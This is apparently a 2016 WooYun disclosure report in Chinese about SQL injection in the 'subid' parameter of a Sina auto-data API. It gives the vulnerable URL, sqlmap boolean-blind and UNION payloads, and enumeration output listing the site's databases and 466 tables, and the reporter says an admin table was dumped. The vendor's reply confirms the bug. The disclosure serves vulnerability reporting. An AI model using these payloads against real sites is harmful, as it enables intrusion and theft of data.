当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187450

漏洞标题:新浪某站SQL注入漏洞

相关厂商:新浪

漏洞作者: 心云

提交时间:2016-03-22 09:19

修复时间:2016-05-06 12:10

公开时间:2016-05-06 12:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-22: 细节已通知厂商并且等待厂商处理中
2016-03-22: 厂商已经确认,细节仅向厂商公开
2016-04-01: 细节向核心白帽子及相关领域专家公开
2016-04-11: 细节向普通白帽子公开
2016-04-21: 细节向实习白帽子公开
2016-05-06: 细节向公众公开

简要描述:

求个首页 求高rank

详细说明:

注入点:

http://data.auto.sina.com.cn/car/api/car_detail/filter_car.php?callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027&_=1458496287525


注入参数为 subid
丢给sqlmap

Parameter: subid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 AND 2090=2090&_=1458496287525
Type: UNION query
Title: MySQL UNION query (17) - 6 columns
Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 UNION ALL SELECT 17,17,17,17,17,CONCAT(0x7171717171,0x4c796f
---
[20:17:23] [INFO] testing MySQL
[20:17:23] [INFO] confirming MySQL
[20:17:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[20:17:25] [INFO] fetching database names
[20:17:25] [INFO] the SQL query used returns 3 entries
[20:17:25] [INFO] retrieved: information_schema
[20:17:26] [INFO] retrieved: dataauto
[20:17:26] [INFO] retrieved: test
available databases [3]:
[*] dataauto
[*] information_schema
[*] test


漏洞证明:

当前user ,库:

数据库.jpg


当前库466个表:

466.jpg


具体表信息:

Database: dataauto
[466 tables]
+-----------------------------+
| Complaints |
| admin_accounts |
| admin_data_auto_log |
| admin_project |
| anbangbaoxian |
| api_log |
| assurecar |
| auto_brands |
| auto_brands_related |
| auto_car |
| auto_car_info |
| auto_car_info_new |
| auto_car_new |
| auto_clicks |
| auto_clicks_days |
| auto_color |
| auto_dealer |
| auto_groups |
| auto_highlights |
| auto_market |
| auto_module_cache |
| auto_newcar |
| auto_news |
| auto_o_n_log |
| auto_sale |
| auto_sub_cache |
| auto_subbrand_top_info |
| auto_subbrands |
| auto_subbrands_price |
| auto_type |
| auto_vote |
| autoxianxing |
| beautifycar |
| bitauto_adv |
| bitauto_carcontrast |
| bitauto_city |
| bitauto_news |
| bitauto_price |
| bitauto_price_20110130 |
| bitauto_price_bak |
| bitauto_price_bak_20100917 |
| bitauto_price_g |
| bitauto_price_tmp |
| bitauto_province |
| bitauto_subbrandcontrast |
| bitauto_vendor |
| bitauto_vendor_1119 |
| bitauto_vendor_1122 |
| bitauto_vendor_bak_1122 |
| bitauto_vendor_bak_20100917 |
| bitauto_vendor_g |
| bitauto_vendor_ne |
| bitauto_vendor_tmp |
| buycar |
| buycar_score |
| cachekey |
| car_hot_rank |
| car_hot_trend |
| car_pv |
| ce_ping |
| comReplay |
| compare_log |
| compare_log_pic |
| compare_log_refer |
| data_match_1 |
| data_match_10 |
| data_match_100 |
| data_match_101 |
| data_match_102 |
| data_match_103 |
| data_match_104 |
| data_match_105 |
| data_match_106 |
| data_match_107 |
| data_match_108 |
| data_match_109 |
| data_match_11 |
| data_match_110 |
| data_match_111 |
| data_match_112 |
| data_match_113 |
| data_match_114 |
| data_match_115 |
| data_match_116 |
| data_match_117 |
| data_match_118 |
| data_match_119 |
| data_match_12 |
| data_match_120 |
| data_match_121 |
| data_match_122 |
| data_match_123 |
| data_match_124 |
| data_match_125 |
| data_match_126 |
| data_match_127 |
| data_match_128 |
| data_match_129 |
| data_match_13 |
| data_match_130 |
| data_match_131 |
| data_match_132 |
| data_match_133 |
| data_match_134 |
| data_match_135 |
| data_match_136 |
| data_match_137 |
| data_match_138 |
| data_match_139 |
| data_match_14 |
| data_match_140 |
| data_match_141 |
| data_match_142 |
| data_match_143 |
| data_match_144 |
| data_match_145 |
| data_match_146 |
| data_match_147 |
| data_match_148 |
| data_match_149 |
| data_match_15 |
| data_match_150 |
| data_match_151 |
| data_match_152 |
| data_match_153 |
| data_match_154 |
| data_match_155 |
| data_match_156 |
| data_match_157 |
| data_match_158 |
| data_match_159 |
| data_match_16 |
| data_match_160 |
| data_match_161 |
| data_match_162 |
| data_match_163 |
| data_match_164 |
| data_match_165 |
| data_match_166 |
| data_match_167 |
| data_match_168 |
| data_match_169 |
| data_match_17 |
| data_match_170 |
| data_match_171 |
| data_match_172 |
| data_match_173 |
| data_match_174 |
| data_match_175 |
| data_match_176 |
| data_match_177 |
| data_match_178 |
| data_match_179 |
| data_match_18 |
| data_match_180 |
| data_match_181 |
| data_match_182 |
| data_match_183 |
| data_match_184 |
| data_match_185 |
| data_match_186 |
| data_match_187 |
| data_match_188 |
| data_match_189 |
| data_match_19 |
| data_match_190 |
| data_match_191 |
| data_match_192 |
| data_match_193 |
| data_match_194 |
| data_match_195 |
| data_match_196 |
| data_match_197 |
| data_match_198 |
| data_match_199 |
| data_match_2 |
| data_match_20 |
| data_match_200 |
| data_match_21 |
| data_match_22 |
| data_match_23 |
| data_match_24 |
| data_match_25 |
| data_match_26 |
| data_match_27 |
| data_match_28 |
| data_match_29 |
| data_match_3 |
| data_match_30 |
| data_match_31 |
| data_match_32 |
| data_match_33 |
| data_match_34 |
| data_match_35 |
| data_match_36 |
| data_match_37 |
| data_match_38 |
| data_match_39 |
| data_match_4 |
| data_match_40 |
| data_match_41 |
| data_match_42 |
| data_match_43 |
| data_match_44 |
| data_match_45 |
| data_match_46 |
| data_match_47 |
| data_match_48 |
| data_match_49 |
| data_match_5 |
| data_match_50 |
| data_match_51 |
| data_match_52 |
| data_match_53 |
| data_match_54 |
| data_match_55 |
| data_match_56 |
| data_match_57 |
| data_match_58 |
| data_match_59 |
| data_match_6 |
| data_match_60 |
| data_match_61 |
| data_match_62 |
| data_match_63 |
| data_match_64 |
| data_match_65 |
| data_match_66 |
| data_match_67 |
| data_match_68 |
| data_match_69 |
| data_match_7 |
| data_match_70 |
| data_match_71 |
| data_match_72 |
| data_match_73 |
| data_match_74 |
| data_match_75 |
| data_match_76 |
| data_match_77 |
| data_match_78 |
| data_match_79 |
| data_match_8 |
| data_match_80 |
| data_match_81 |
| data_match_82 |
| data_match_83 |
| data_match_84 |
| data_match_85 |
| data_match_86 |
| data_match_87 |
| data_match_88 |
| data_match_89 |
| data_match_9 |
| data_match_90 |
| data_match_91 |
| data_match_92 |
| data_match_93 |
| data_match_94 |
| data_match_95 |
| data_match_96 |
| data_match_97 |
| data_match_98 |
| data_match_99 |
| data_match_every_day |
| data_match_newdata |
| data_match_newdata_top |
| dpool_check_db |
| feedback |
| feiyong_guanxi |
| feiyong_guanxi_quxiao |
| feiyong_guanxi_xinru |
| feiyong_xinxi |
| feiyong_xinxi_total |
| finecar |
| group_buyers |
| group_car |
| group_car_vote |
| group_car_votedetail |
| group_city_info |
| group_seller_info |
| group_sellers |
| group_sellers_detail |
| hot_seo |
| hot_seo_new |
| iauto_save |
| iauto_save_tmp |
| iauto_trend |
| iauto_trend_tmp |
| iauto_trend_tmp2 |
| index_focus |
| iwords |
| iwords_new |
| iwords_sub |
| iwords_test |
| jdpower_car |
| jdpower_type |
| koubei |
| koubei_click_rank |
| koubei_comment |
| koubei_div_log |
| koubei_grab |
| koubei_grab_ts |
| koubei_impression |
| koubei_impression_user |
| koubei_new_0 |
| koubei_new_1 |
| koubei_new_10 |
| koubei_new_11 |
| koubei_new_12 |
| koubei_new_13 |
| koubei_new_14 |
| koubei_new_15 |
| koubei_new_16 |
| koubei_new_17 |
| koubei_new_18 |
| koubei_new_19 |
| koubei_new_2 |
| koubei_new_20 |
| koubei_new_21 |
| koubei_new_22 |
| koubei_new_23 |
| koubei_new_24 |
| koubei_new_25 |
| koubei_new_26 |
| koubei_new_27 |
| koubei_new_28 |
| koubei_new_29 |
| koubei_new_3 |
| koubei_new_30 |
| koubei_new_31 |
| koubei_new_4 |
| koubei_new_5 |
| koubei_new_6 |
| koubei_new_7 |
| koubei_new_8 |
| koubei_new_9 |
| koubei_new_total |
| koubei_praise |
| koubei_rank |
| koubei_rank_wj |
| koubei_recommend |
| koubei_report |
| koubei_score |
| koubei_score_avg |
| koubei_score_new |
| koubei_score_week_avg |
| koubei_tag_sorted |
| koubei_test |
| koubei_tt |
| koubei_userscores |
| koubei_view |
| koubei_view2 |
| koubei_wap_err |
| koubei_wb_info |
| koubei_xw |
| koubei_xw1 |
| listcar |
| listcar_total |
| listperm |
| local_price |
| local_price_tmp |
| luntai_brands |
| luntai_koubei |
| luntai_subbrands |
| luntais |
| maintain |
| maintaincar |
| mapproject |
| mycar |
| new_view_brands |
| new_view_carlist |
| new_view_subbrands |
| news_feedback |
| news_from_so |
| news_info |
| news_pop |
| news_score |
| oil_brands |
| oil_koubei |
| oil_subbrands |
| oil_use |
| oil_use_test |
| oil_use_v |
| oilcar |
| oils |
| os_gasoline_setting |
| os_gasoline_type |
| os_ministry_data |
| os_netizens_data |
| os_param |
| os_param_base |
| os_param_list |
| os_param_type |
| os_road_conditions |
| os_score |
| os_search_setting |
| os_searchwd |
| os_user_addrecord |
| os_weight |
| permonth_update |
| photo_api |
| publish_key |
| refitcar |
| searchPic |
| shareMan |
| shiche |
| shicheMan |
| shichetubiao |
| shuyu |
| stopcar |
| sub_fav |
| subbrand_attention |
| subbrand_koubei_reports |
| subbrand_month_rank |
| subbrand_news_forum_comment |
| subnameupdate |
| temp_bitauto_vendor |
| test |
| umlike |
| umnews |
| used_car_appraiser |
| used_car_certification |
| used_car_dealer |
| used_car_honor |
| used_car_info |
| used_car_linkman |
| used_car_news |
| used_car_pic |
| user_admin |
| user_admin_module_map |
| user_log |
| user_modle_tree |
| user_score |
| user_total |
| user_type |
| vedioMan |
| vendor_brand |
| vendor_brand_bak |
| vendor_brand_tmp |
| vin_upload |
| washcar |
| weibo_log_1106 |
| weibo_log_110622 |
| weibo_log_110623 |
| weibo_log_110624 |
| weibo_log_110625 |
| weibo_log_110626 |
| weibo_log_110627 |
| weibo_log_1107 |
| weibo_log_1108 |
| weibo_log_1109 |
| weibo_log_1110 |
| weibo_log_1111 |
| weibo_log_1112 |
| wom_top_data |
| xlsj_month |
| xlsjk |
| xlsjk2 |
| xlsjk_tmp |
| yangche_focuscar |
| yh_avgconsumptionall |
| yh_brands |
| yh_car |
| yh_chexi |
| ztmp_bitauto_carcontrast |
+-----------------------------+


只跑个admin表 其他表不跑了 反正危害很严重 :

admin.jpg

修复方案:

1.过滤
2.希望给个高rank 谢谢咯

版权声明:转载请注明来源 心云@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-03-22 12:10

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无


漏洞评价:

评价